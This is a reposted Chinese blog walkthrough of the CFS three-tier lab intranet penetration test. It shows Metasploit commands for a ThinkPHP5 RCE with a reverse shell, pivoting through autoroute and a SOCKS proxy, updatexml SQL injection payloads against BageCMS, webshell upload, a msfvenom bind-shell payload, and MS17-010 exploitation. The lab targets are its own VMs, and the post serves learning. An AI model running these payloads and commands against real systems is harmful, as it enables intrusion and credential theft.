ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

渗透测试之CFS三层靶机内网渗透

2022-02-23 21:03:05  阅读:415  来源: 互联网

标签:use set 网段 渗透 192.168 shell 靶机 CFS target1


一、环境搭建:

靶机拓扑:


 

1.添加虚拟网卡:

添加 22网段(VMnet2) 和 33(VMnet3)网段的网卡

VMnet8为NAT模式与外部通信


2.配置网卡:

target1网络配置:

target2网络配置:

target3网络配置:

 3.web靶机搭建(宝塔面板启动)

启动命令: /etc/init.d/bt start

重启 /etc/init.d/bt restart

默认端口管理8888

环境搭建完 kali能ping通target1  target1能ping通target2   target2能ping通target3  三层网络关系

二、渗透测试:

信息收集:

target1(thinkphp5搭建)

 使用nmap扫描端口

nmap -sV -p 1-65535 -T4 192.168.234.178

因为是thinkphp5  想到远程命令执行 (网上很多利用脚本自行选择 我用msf一把梭)

search thinkphp                (查找可利用exp)
use 0                          (选择exp)
set rhosts 192.168.234.178     (目标target1的ip)
set rport 80                   (目标target1的端口)
set lhost 192.168.234.130      (shell接收ip 这里是kali本机ip)
set lport 4444                 (shell接收端口)
run                            (执行exp)

执行返回一个shell  target1拿下


信息收集

getuid     
sysinfo
ifconfig

查看ip发现两个ip (22网段是内网网段)

使用msf添加路由

run autoroute -s 192.168.22.0         添加22网段路由

run autoroute -p                               查看路由

已经添加路由,但是只有返回的这个shell能访问22网段内网靶机;

使用sock4+proxychains4代理打通内网

use auxiliary/server/socks_proxy 
options
set srvhost 192.168.234.130
set version 4a

 

还需要修改kali /etc/proxychains4.conf文件 (在最后一行添加) 

 

代理下使用namp扫描 

proxychains4 nmap -Pn -sT 192.168.22.0/24

proxychains4 nmap -Pn -sT 192.168.22.129

 内网还有web 配置kali浏览器sock代理

 

 使用八哥CMS搭建

 使用gobuster扫描目录 (可以先手工测试,我直接使用工具偷懒,反而错过重要信息)

proxychains4  gobuster dir -u http://192.168.22.129/    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php 

访问 robots.txt 发现目录  

 在index.php中发现sql注入提示

 手工报错注入

 爆数据库名:

index.php?r=vul&keyword=1 ' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+

爆表名:

index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+

最后爆出数据: admin 123qwe

 

 md5解密后得到后台账号密码 admin 123qwe

登录后台 http://url/index.php?r=admini/default/index

 内容模板写入shell

使用AntSword设置代理连接shell

 

 信息收集 发现33网段

 因为是使用代理访问的22网段的shell 访问不到33网段 所以使用msf生成一个正向马

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elf 

 将马子赋执行权限上传到webshell中 同时使用代理开启一个msf

proxychains4 msfconsole 

使用代理的msf开启监听

use exploit/multi/handler                      使用监听模块
set payload linux/x86/meterpreter/bind_tcp     设置payload
set lport   4444                               设置接收端口与msfvenoms生成端口一致
set rhost   192.168.22.129                     设置目标主机(target2)

 拿到 target2 shell


 添加33网段路由

 run autoroute -s 192.168.33.0/24

run autoroute -p

 

 使用msf扫描模块扫描端口

use auxiliary/scanner/portscan/tcp

 

 发现 192.168.33.33 主机并开放 445、3389  敏感端口

 msf尝试永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010     检测ms17010是否存在

use exploit/windows/smb/ms17_010_psexe     利用ms17010

使用ms17_010_psexe 提示执行成功,但是没有创建会话 (这里不是很明白)

use auxiliary/admin/smb/ms17_010_command     这个exp可以执行命令


 至此三台靶机shell拿下了,后续还可以进行很多操作,比如windows提权和centos提权;

标签:use,set,网段,渗透,192.168,shell,靶机,CFS,target1
来源: https://blog.csdn.net/LvHLong/article/details/123092182

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有